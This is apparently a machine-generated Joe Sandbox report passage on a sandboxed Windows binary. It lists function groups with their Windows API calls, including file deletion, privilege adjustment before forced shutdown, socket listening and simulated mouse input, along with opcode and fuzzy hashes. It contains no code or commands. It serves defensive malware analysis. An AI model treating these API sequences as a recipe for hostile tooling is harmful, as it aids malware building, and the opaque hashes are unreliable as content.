                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00789840
                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00789890
                                                                • SetCurrentDirectoryW.KERNEL32(007D6B7C), ref: 007898AE
                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 007898B8
                                                                • FindClose.KERNEL32(00000000), ref: 007898C5
                                                                • FindClose.KERNEL32(00000000), ref: 007898D5
                                                                  • Part of subcall function 0077DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0077DB00
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                • String ID: *.*
                                                                • API String ID: 2640511053-438819550
                                                                • Opcode ID: aed0af55bc730b3888182c04a3562b5680cb5ad48e1b07822a8069f282657d21
                                                                • Instruction ID: 46cd3f0ec63e8c1e6efcd3a4ce6290e8e6a1d0c281f81b25f855111afa7bb3e6
                                                                • Opcode Fuzzy Hash: aed0af55bc730b3888182c04a3562b5680cb5ad48e1b07822a8069f282657d21
                                                                • Instruction Fuzzy Hash: 0C31E57258021ABEEF10AFB4DC48AEE37ACAF46320F188156E950A21D1DB39DD448B64
                                                                APIs
                                                                • GetLocalTime.KERNEL32(?), ref: 00788257
                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00788267
                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00788273
                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00788310
                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00788324
                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00788356
                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0078838C
                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00788395
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: CurrentDirectoryTime$File$Local$System
                                                                • String ID: *.*
                                                                • API String ID: 1464919966-438819550
                                                                • Opcode ID: bd9edf07b6185b93a98b33d185296ee8198aba7e26d99652cedd5496b9697f4b
                                                                • Instruction ID: 6fba0a85c048567482ed5dcfcfe7098b29670df480dd8df3f8dc156f1a006c0b
                                                                • Opcode Fuzzy Hash: bd9edf07b6185b93a98b33d185296ee8198aba7e26d99652cedd5496b9697f4b
                                                                • Instruction Fuzzy Hash: DA617BB25443059FCB10EF64C8449AEB3E9FF89310F44891EF999C7251EB39E945CB92
                                                                APIs
                                                                  • Part of subcall function 00713AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00713A97,?,?,00712E7F,?,?,?,00000000), ref: 00713AC2
                                                                  • Part of subcall function 0077E199: GetFileAttributesW.KERNEL32(?,0077CF95), ref: 0077E19A
                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0077D122
                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0077D1DD
                                                                • MoveFileW.KERNEL32(?,?), ref: 0077D1F0
                                                                • DeleteFileW.KERNEL32(?,?,?,?), ref: 0077D20D
                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0077D237
                                                                  • Part of subcall function 0077D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0077D21C,?,?), ref: 0077D2B2
                                                                • FindClose.KERNEL32(00000000,?,?,?), ref: 0077D253
                                                                • FindClose.KERNEL32(00000000), ref: 0077D264
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                • String ID: \*.*
                                                                • API String ID: 1946585618-1173974218
                                                                • Opcode ID: a8e463fee453c985c01bfb774e519a2e86619f2aa5eb1a1460c15b6fff81d1c3
                                                                • Instruction ID: 1f49a11783cd33b1f511c938a3580366ca277e130ce0a6f379f41f4f6855aa5c
                                                                • Opcode Fuzzy Hash: a8e463fee453c985c01bfb774e519a2e86619f2aa5eb1a1460c15b6fff81d1c3
                                                                • Instruction Fuzzy Hash: 91618C3180110DEFCF15EBE4C9969EDB7B9AF55340F248065E50A77192EB38AF4ACB60
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                • String ID:
                                                                • API String ID: 1737998785-0
                                                                • Opcode ID: 81dc2018dd5b35acd2b2d6e76b076b0457d2b0da4d7cb6fee5e29de10933396b
                                                                • Instruction ID: b3dc44cb50ab052d5fb7f293f49f538a7bceeae591fce03841f2272534dfe90b
                                                                • Opcode Fuzzy Hash: 81dc2018dd5b35acd2b2d6e76b076b0457d2b0da4d7cb6fee5e29de10933396b
                                                                • Instruction Fuzzy Hash: F9418D35244611EFE721EF15D888B59BBE5FF45318F14C099E4158B6A2C739EC42CB94
                                                                APIs
                                                                  • Part of subcall function 007716C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0077170D
                                                                  • Part of subcall function 007716C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0077173A
                                                                  • Part of subcall function 007716C3: GetLastError.KERNEL32 ref: 0077174A
                                                                • ExitWindowsEx.USER32(?,00000000), ref: 0077E932
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                • String ID: $ $@$SeShutdownPrivilege
                                                                • API String ID: 2234035333-3163812486
                                                                • Opcode ID: 0a0e9755ed3d4f0c1e54f7d341ad550eddc1e42f33232dda7ade74d32f1b6513
                                                                • Instruction ID: 4ac8a1da5beee408550004aed758433446311a5863956aaee349a67a270a4d24
                                                                • Opcode Fuzzy Hash: 0a0e9755ed3d4f0c1e54f7d341ad550eddc1e42f33232dda7ade74d32f1b6513
                                                                • Instruction Fuzzy Hash: D9012B73610210BBEF5426749C89BBB725C97087C4F15C462FA06E21D1D6AC7C408695
                                                                APIs
                                                                • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00791276
                                                                • WSAGetLastError.WSOCK32 ref: 00791283
                                                                • bind.WSOCK32(00000000,?,00000010), ref: 007912BA
                                                                • WSAGetLastError.WSOCK32 ref: 007912C5
                                                                • closesocket.WSOCK32(00000000), ref: 007912F4
                                                                • listen.WSOCK32(00000000,00000005), ref: 00791303
                                                                • WSAGetLastError.WSOCK32 ref: 0079130D
                                                                • closesocket.WSOCK32(00000000), ref: 0079133C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$closesocket$bindlistensocket
                                                                • String ID:
                                                                • API String ID: 540024437-0
                                                                • Opcode ID: 47335f9a358128dab459d3b5408c19b90a1a5232dfa1c3e9869a847cd8a3357d
                                                                • Instruction ID: f581364c2dc70ccfe56072e5df8c08002543a07f46a255e19c6a8cca276a01d1
                                                                • Opcode Fuzzy Hash: 47335f9a358128dab459d3b5408c19b90a1a5232dfa1c3e9869a847cd8a3357d
                                                                • Instruction Fuzzy Hash: 6F418431600101AFDB10EF68D488B69BBE6BF86314F58C198D8569F2D2C779ED81CBE1
                                                                APIs
                                                                • _free.LIBCMT ref: 0074B9D4
                                                                • _free.LIBCMT ref: 0074B9F8
                                                                • _free.LIBCMT ref: 0074BB7F
                                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,007B3700), ref: 0074BB91
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,007E121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0074BC09
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,007E1270,000000FF,?,0000003F,00000000,?), ref: 0074BC36
                                                                • _free.LIBCMT ref: 0074BD4B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                • String ID:
                                                                • API String ID: 314583886-0
                                                                • Opcode ID: baed38c1295b14245252ff145fb3e7ccd5e0d8c9bce136aeffc2de196ea8a039
                                                                • Instruction ID: 086a74d2097ddd68e8e7b89f7d373dba962e423273e7d17aad71218db7656871
                                                                • Opcode Fuzzy Hash: baed38c1295b14245252ff145fb3e7ccd5e0d8c9bce136aeffc2de196ea8a039
                                                                • Instruction Fuzzy Hash: 38C15671A04244EFDB209F79CC85BAE7BB9EF45310F18819AE590DB252E738DE42CB50
                                                                APIs
                                                                  • Part of subcall function 00713AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00713A97,?,?,00712E7F,?,?,?,00000000), ref: 00713AC2
                                                                  • Part of subcall function 0077E199: GetFileAttributesW.KERNEL32(?,0077CF95), ref: 0077E19A
                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0077D420
                                                                • DeleteFileW.KERNEL32(?,?,?,?), ref: 0077D470
                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0077D481
                                                                • FindClose.KERNEL32(00000000), ref: 0077D498
                                                                • FindClose.KERNEL32(00000000), ref: 0077D4A1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                • String ID: \*.*
                                                                • API String ID: 2649000838-1173974218
                                                                • Opcode ID: ae3cdb34a0ea8de410d6d159b06d385f14aa5b4f4d825e10a3e5ae52c111b634
                                                                • Instruction ID: 48e10a85b0e9c74252726a5ea6374990367a8fd1cd3b0c1da4c5a09b27049853
                                                                • Opcode Fuzzy Hash: ae3cdb34a0ea8de410d6d159b06d385f14aa5b4f4d825e10a3e5ae52c111b634
                                                                • Instruction Fuzzy Hash: 2D318171008381ABC711EF64C8558EFB7B8BE91350F44891DF4D5521D1EB28AE49C767
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: __floor_pentium4
                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                • API String ID: 4168288129-2761157908
                                                                • Opcode ID: 6438fa1dae4be82e3f1e67f6d38bb40d6ac640762a464eda0afb28ce18a09e8f
                                                                • Instruction ID: b94f35600fa1faed84426f93ab01cc4148812555cb312560ec175ac0d9ad1d44
                                                                • Opcode Fuzzy Hash: 6438fa1dae4be82e3f1e67f6d38bb40d6ac640762a464eda0afb28ce18a09e8f
                                                                • Instruction Fuzzy Hash: BEC23972E086288FDB25CE28DD447EAB7B5FB48315F1541EAD84DE7241E778AE818F40
                                                                APIs
                                                                • _wcslen.LIBCMT ref: 007864DC
                                                                • CoInitialize.OLE32(00000000), ref: 00786639
                                                                • CoCreateInstance.OLE32(007AFCF8,00000000,00000001,007AFB68,?), ref: 00786650
                                                                • CoUninitialize.OLE32 ref: 007868D4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                • String ID: .lnk
                                                                • API String ID: 886957087-24824748
                                                                • Opcode ID: 1ad0bd90e4bae2a157a8b23998a23ee03dacb8135cf5a17facc95dd45ec2817f
                                                                • Instruction ID: b5e507368f04c98dbfce830ca91f85da0fafd7c3864cf5ddf2751edc04662272
                                                                • Opcode Fuzzy Hash: 1ad0bd90e4bae2a157a8b23998a23ee03dacb8135cf5a17facc95dd45ec2817f
                                                                • Instruction Fuzzy Hash: 3FD15D71548301AFC304EF24C8959ABB7E8FF98704F00496DF5958B291DB74ED46CBA2
                                                                APIs
                                                                • GetForegroundWindow.USER32(?,?,00000000), ref: 007922E8
                                                                  • Part of subcall function 0078E4EC: GetWindowRect.USER32(?,?), ref: 0078E504
                                                                • GetDesktopWindow.USER32 ref: 00792312
                                                                • GetWindowRect.USER32(00000000), ref: 00792319
                                                                • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00792355
                                                                • GetCursorPos.USER32(?), ref: 00792381
                                                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 007923DF
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                • String ID:
                                                                • API String ID: 2387181109-0
                                                                • Opcode ID: 74626ba06ae9e3f32bfdbd6df191f89e4cc1576afe3b89ae312d9380aa37dded
                                                                • Instruction ID: 251b3c70d79bc3e8cc5b3627ad737d4d9e2cbdc03e739c03e570955870b0e2a4
                                                                • Opcode Fuzzy Hash: 74626ba06ae9e3f32bfdbd6df191f89e4cc1576afe3b89ae312d9380aa37dded
                                                                • Instruction Fuzzy Hash: 5931E072504315AFCB21EF14D849B5BBBA9FFC9310F004919F98997182DB38EA09CB96
                                                                APIs
                                                                  • Part of subcall function 00719CB3: _wcslen.LIBCMT ref: 00719CBD
                                                                • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00789B78
                                                                • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00789C8B
                                                                  • Part of subcall function 00783874: GetInputState.USER32 ref: 007838CB
                                                                  • Part of subcall function 00783874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00783966
                                                                • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00789BA8
                                                                • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00789C75
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                • String ID: *.*
                                                                • API String ID: 1972594611-438819550
                                                                • Opcode ID: 09a0309cb29f231e064a647f5641163a1e40ab224fe65885183f3076a809259f
                                                                • Instruction ID: a90d64912a4ddcf9ee2f3db1ae3159fdb9dd2a2be9e2a67a55a1f03b3bc84655
                                                                • Opcode Fuzzy Hash: 09a0309cb29f231e064a647f5641163a1e40ab224fe65885183f3076a809259f
                                                                • Instruction Fuzzy Hash: 66418371940209EFDF15EF74C849AEEBBB4FF45310F244156E905A2191EB399E84CF64
                                                                APIs
                                                                  • Part of subcall function 00729BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00729BB2
                                                                • DefDlgProcW.USER32(?,?,?,?,?), ref: 00729A4E
                                                                • GetSysColor.USER32(0000000F), ref: 00729B23
                                                                • SetBkColor.GDI32(?,00000000), ref: 00729B36
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Color$LongProcWindow
                                                                • String ID:
                                                                • API String ID: 3131106179-0
                                                                • Opcode ID: fa809e35345170dc9e7ca2c602f505803d98e37d457e3317320fb0adc8c3934d
                                                                • Instruction ID: 537bb205f96940ef3e425cb51287367c28107cd6367a87638e964c25096f45ba
                                                                • Opcode Fuzzy Hash: fa809e35345170dc9e7ca2c602f505803d98e37d457e3317320fb0adc8c3934d
                                                                • Instruction Fuzzy Hash: 41A14BB0109564FEE72D9A3CAC8DD7B26ADDF87354F188209FB03CA591CA2D9D41C275
                                                                APIs
                                                                  • Part of subcall function 0079304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0079307A
                                                                  • Part of subcall function 0079304E: _wcslen.LIBCMT ref: 0079309B
                                                                • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0079185D
                                                                • WSAGetLastError.WSOCK32 ref: 00791884
                                                                • bind.WSOCK32(00000000,?,00000010), ref: 007918DB
                                                                • WSAGetLastError.WSOCK32 ref: 007918E6
                                                                • closesocket.WSOCK32(00000000), ref: 00791915
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                • String ID:
                                                                • API String ID: 1601658205-0
                                                                • Opcode ID: 05a676cb686d0d096d18536a321371709b4f72738e5fa3d793365e6b9cae3269
                                                                • Instruction ID: b58b9c2e3cb7a583d2fb73c7095b2db2ab23c087bce01bb604ccd77e3dc0044c
                                                                • Opcode Fuzzy Hash: 05a676cb686d0d096d18536a321371709b4f72738e5fa3d793365e6b9cae3269
                                                                • Instruction Fuzzy Hash: 5D51B271A00210AFEB10AF28D88AF6A77E5AB45718F48C098F9155F3C3C779AD41CBE1
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                • String ID:
                                                                • API String ID: 292994002-0
                                                                • Opcode ID: 75a7eb5387a3e1d9517a3c40989eeb29a6e49fb45078b7826b829fcbaab44ffc
                                                                • Instruction ID: a8996c36dca701b868b75ecbc45157b8a3a4aa0f26dac9a65b8e974d398cc0dc
                                                                • Opcode Fuzzy Hash: 75a7eb5387a3e1d9517a3c40989eeb29a6e49fb45078b7826b829fcbaab44ffc
                                                                • Instruction Fuzzy Hash: 2B21B5317402109FE7218F2AC844B6A7BE5EFC6325F598158E846CB352DB79DC42CBA4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                • API String ID: 0-1546025612
                                                                • Opcode ID: df8e9dc1cdb6a7926c90eeb52d33befd0598dd8548cd29112a85b89358718b2d
                                                                • Instruction ID: 6f557e7a13bc18746ad785e39757a3d4a7b738f0cd969186fb62d65c51621c92
